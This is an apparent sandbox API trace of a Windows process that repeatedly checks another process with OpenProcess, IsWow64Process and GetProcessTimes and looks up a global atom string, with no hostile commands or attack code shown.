	[0125.265] CloseHandle (hObject=0x69c) returned 1
	[0125.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.265] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.265] CloseHandle (hObject=0x69c) returned 1
	[0125.265] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.265] CloseHandle (hObject=0x69c) returned 1
	[0125.266] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.266] CloseHandle (hObject=0x69c) returned 1
	[0125.266] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.266] CloseHandle (hObject=0x69c) returned 1
	[0125.266] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.266] CloseHandle (hObject=0x69c) returned 1
	[0125.300] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.300] CloseHandle (hObject=0x69c) returned 1
	[0125.301] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.301] CloseHandle (hObject=0x69c) returned 1
	[0125.301] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.301] CloseHandle (hObject=0x69c) returned 1
	[0125.301] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.301] CloseHandle (hObject=0x69c) returned 1
	[0125.301] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.301] CloseHandle (hObject=0x69c) returned 1
	[0125.301] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.301] CloseHandle (hObject=0x69c) returned 1
	[0125.302] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.302] CloseHandle (hObject=0x69c) returned 1
	[0125.302] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.302] CloseHandle (hObject=0x69c) returned 1
	[0125.302] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.302] CloseHandle (hObject=0x69c) returned 1
	[0125.302] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.302] CloseHandle (hObject=0x69c) returned 1
	[0125.303] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.303] CloseHandle (hObject=0x69c) returned 1
	[0125.303] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.303] CloseHandle (hObject=0x69c) returned 1
	[0125.303] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.303] CloseHandle (hObject=0x69c) returned 1
	[0125.303] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.303] CloseHandle (hObject=0x69c) returned 1
	[0125.303] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.303] CloseHandle (hObject=0x69c) returned 1
	[0125.304] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.304] CloseHandle (hObject=0x69c) returned 1
	[0125.304] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.304] CloseHandle (hObject=0x69c) returned 1
	[0125.304] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.304] CloseHandle (hObject=0x69c) returned 1
	[0125.304] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.304] CloseHandle (hObject=0x69c) returned 1
	[0125.305] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.305] CloseHandle (hObject=0x69c) returned 1
	[0125.305] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.305] CloseHandle (hObject=0x69c) returned 1
	[0125.305] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.305] CloseHandle (hObject=0x69c) returned 1
	[0125.305] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.305] CloseHandle (hObject=0x69c) returned 1
	[0125.305] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.305] CloseHandle (hObject=0x69c) returned 1
	[0125.306] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.306] CloseHandle (hObject=0x69c) returned 1
	[0125.306] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.306] CloseHandle (hObject=0x69c) returned 1
	[0125.306] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.306] CloseHandle (hObject=0x69c) returned 1
	[0125.306] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.306] CloseHandle (hObject=0x69c) returned 1
	[0125.307] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.307] CloseHandle (hObject=0x69c) returned 1
	[0125.307] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.307] CloseHandle (hObject=0x69c) returned 1
	[0125.307] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.307] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.307] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.308] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.308] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.308] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.309] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.309] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.309] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.309] CloseHandle (hObject=0x69c) returned 1
	[0125.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.309] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.309] CloseHandle (hObject=0x69c) returned 1
	[0125.309] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.310] CloseHandle (hObject=0x69c) returned 1
	[0125.310] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.310] CloseHandle (hObject=0x69c) returned 1
	[0125.310] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.310] CloseHandle (hObject=0x69c) returned 1
	[0125.310] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.310] CloseHandle (hObject=0x69c) returned 1
	[0125.344] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.344] CloseHandle (hObject=0x69c) returned 1
	[0125.344] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.344] CloseHandle (hObject=0x69c) returned 1
	[0125.344] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.344] CloseHandle (hObject=0x69c) returned 1
	[0125.345] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.345] CloseHandle (hObject=0x69c) returned 1
	[0125.345] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.345] CloseHandle (hObject=0x69c) returned 1
	[0125.345] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.345] CloseHandle (hObject=0x69c) returned 1
	[0125.345] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.345] CloseHandle (hObject=0x69c) returned 1
	[0125.346] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.346] CloseHandle (hObject=0x69c) returned 1
	[0125.346] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.346] CloseHandle (hObject=0x69c) returned 1
	[0125.346] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.346] CloseHandle (hObject=0x69c) returned 1
	[0125.346] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.346] CloseHandle (hObject=0x69c) returned 1
	[0125.346] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.346] CloseHandle (hObject=0x69c) returned 1
	[0125.347] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.347] CloseHandle (hObject=0x69c) returned 1
	[0125.347] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.347] CloseHandle (hObject=0x69c) returned 1
	[0125.347] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.347] CloseHandle (hObject=0x69c) returned 1
	[0125.347] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.347] CloseHandle (hObject=0x69c) returned 1
	[0125.347] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.348] CloseHandle (hObject=0x69c) returned 1
	[0125.348] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.348] CloseHandle (hObject=0x69c) returned 1
	[0125.348] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.348] CloseHandle (hObject=0x69c) returned 1
	[0125.348] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.348] CloseHandle (hObject=0x69c) returned 1
	[0125.348] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.348] CloseHandle (hObject=0x69c) returned 1
	[0125.349] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.349] CloseHandle (hObject=0x69c) returned 1
	[0125.349] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.349] CloseHandle (hObject=0x69c) returned 1
	[0125.349] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.349] CloseHandle (hObject=0x69c) returned 1
	[0125.349] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.349] CloseHandle (hObject=0x69c) returned 1
	[0125.349] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.350] CloseHandle (hObject=0x69c) returned 1
	[0125.350] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.350] CloseHandle (hObject=0x69c) returned 1
	[0125.350] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.350] CloseHandle (hObject=0x69c) returned 1
	[0125.350] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.350] CloseHandle (hObject=0x69c) returned 1
	[0125.350] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.350] CloseHandle (hObject=0x69c) returned 1
	[0125.351] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.351] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.351] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.351] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.352] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.352] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.352] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.352] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.352] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.352] CloseHandle (hObject=0x69c) returned 1
	[0125.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.353] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.353] CloseHandle (hObject=0x69c) returned 1
	[0125.353] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.353] CloseHandle (hObject=0x69c) returned 1
	[0125.353] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.353] CloseHandle (hObject=0x69c) returned 1
	[0125.353] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.353] CloseHandle (hObject=0x69c) returned 1
	[0125.353] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.353] CloseHandle (hObject=0x69c) returned 1
	[0125.386] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.386] CloseHandle (hObject=0x69c) returned 1
	[0125.386] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.386] CloseHandle (hObject=0x69c) returned 1
	[0125.386] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.386] CloseHandle (hObject=0x69c) returned 1
	[0125.386] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.386] CloseHandle (hObject=0x69c) returned 1
	[0125.387] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.387] CloseHandle (hObject=0x69c) returned 1
	[0125.387] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.387] CloseHandle (hObject=0x69c) returned 1
	[0125.387] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.387] CloseHandle (hObject=0x69c) returned 1
	[0125.387] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.387] CloseHandle (hObject=0x69c) returned 1
	[0125.387] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.387] CloseHandle (hObject=0x69c) returned 1
	[0125.388] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.388] CloseHandle (hObject=0x69c) returned 1
	[0125.388] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.388] CloseHandle (hObject=0x69c) returned 1
	[0125.388] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.388] CloseHandle (hObject=0x69c) returned 1
	[0125.388] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.388] CloseHandle (hObject=0x69c) returned 1
	[0125.389] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.389] CloseHandle (hObject=0x69c) returned 1
	[0125.389] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.389] CloseHandle (hObject=0x69c) returned 1
	[0125.389] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.389] CloseHandle (hObject=0x69c) returned 1
	[0125.389] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.389] CloseHandle (hObject=0x69c) returned 1
	[0125.389] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.389] CloseHandle (hObject=0x69c) returned 1
	[0125.390] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.390] CloseHandle (hObject=0x69c) returned 1
	[0125.390] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.390] CloseHandle (hObject=0x69c) returned 1
	[0125.390] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.390] CloseHandle (hObject=0x69c) returned 1
	[0125.390] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.390] CloseHandle (hObject=0x69c) returned 1
	[0125.391] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.391] CloseHandle (hObject=0x69c) returned 1
	[0125.391] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.391] CloseHandle (hObject=0x69c) returned 1
	[0125.391] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.391] CloseHandle (hObject=0x69c) returned 1
	[0125.391] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.392] CloseHandle (hObject=0x69c) returned 1
	[0125.392] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.392] CloseHandle (hObject=0x69c) returned 1
	[0125.392] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.392] CloseHandle (hObject=0x69c) returned 1
	[0125.392] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.392] CloseHandle (hObject=0x69c) returned 1
	[0125.393] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.393] CloseHandle (hObject=0x69c) returned 1
	[0125.393] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.393] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.393] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.393] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.394] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.394] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.394] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.394] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.394] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.394] CloseHandle (hObject=0x69c) returned 1
	[0125.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.395] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.395] CloseHandle (hObject=0x69c) returned 1
	[0125.395] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.395] CloseHandle (hObject=0x69c) returned 1
	[0125.395] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.395] CloseHandle (hObject=0x69c) returned 1
	[0125.395] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.395] CloseHandle (hObject=0x69c) returned 1
	[0125.395] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.395] CloseHandle (hObject=0x69c) returned 1
	[0125.430] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.430] CloseHandle (hObject=0x69c) returned 1
	[0125.430] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.430] CloseHandle (hObject=0x69c) returned 1
	[0125.430] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.430] CloseHandle (hObject=0x69c) returned 1
	[0125.430] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.430] CloseHandle (hObject=0x69c) returned 1
	[0125.431] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.431] CloseHandle (hObject=0x69c) returned 1
	[0125.431] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.431] CloseHandle (hObject=0x69c) returned 1
	[0125.431] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.431] CloseHandle (hObject=0x69c) returned 1
	[0125.431] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.431] CloseHandle (hObject=0x69c) returned 1
	[0125.432] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.432] CloseHandle (hObject=0x69c) returned 1
	[0125.432] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.432] CloseHandle (hObject=0x69c) returned 1
	[0125.432] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.432] CloseHandle (hObject=0x69c) returned 1
	[0125.433] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.433] CloseHandle (hObject=0x69c) returned 1
	[0125.433] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.433] CloseHandle (hObject=0x69c) returned 1
	[0125.433] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.433] CloseHandle (hObject=0x69c) returned 1
	[0125.433] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.433] CloseHandle (hObject=0x69c) returned 1
	[0125.433] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.433] CloseHandle (hObject=0x69c) returned 1
	[0125.434] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.434] CloseHandle (hObject=0x69c) returned 1
	[0125.434] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.434] CloseHandle (hObject=0x69c) returned 1
	[0125.434] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.434] CloseHandle (hObject=0x69c) returned 1
	[0125.434] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.434] CloseHandle (hObject=0x69c) returned 1
	[0125.434] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.434] CloseHandle (hObject=0x69c) returned 1
	[0125.435] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.435] CloseHandle (hObject=0x69c) returned 1
	[0125.435] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.435] CloseHandle (hObject=0x69c) returned 1
	[0125.435] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.435] CloseHandle (hObject=0x69c) returned 1
	[0125.435] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.435] CloseHandle (hObject=0x69c) returned 1
	[0125.436] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.436] CloseHandle (hObject=0x69c) returned 1
	[0125.436] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.436] CloseHandle (hObject=0x69c) returned 1
	[0125.436] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.436] CloseHandle (hObject=0x69c) returned 1
	[0125.436] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.436] CloseHandle (hObject=0x69c) returned 1
	[0125.436] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.437] CloseHandle (hObject=0x69c) returned 1
	[0125.437] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.437] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.437] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.438] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.438] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
